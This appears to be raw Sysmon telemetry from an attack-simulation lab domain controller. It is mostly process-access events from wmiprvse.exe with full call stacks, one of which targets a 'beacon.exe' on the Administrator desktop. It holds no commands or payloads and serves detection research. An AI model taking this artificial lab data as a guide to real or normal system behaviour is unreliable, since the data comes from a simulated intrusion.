16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FE9060BFE41BA24D4296B62F4B71805,SHA256=CFB139D5CF5C9042F3E552F61B8FE52927C9ED41DD269E7BA030B53AE6381113,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002238599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:44.404{05ADC7E1-6D98-603E-97AA-00000000AD01}13564\PSHost.132591776242643112.13564.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002238598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 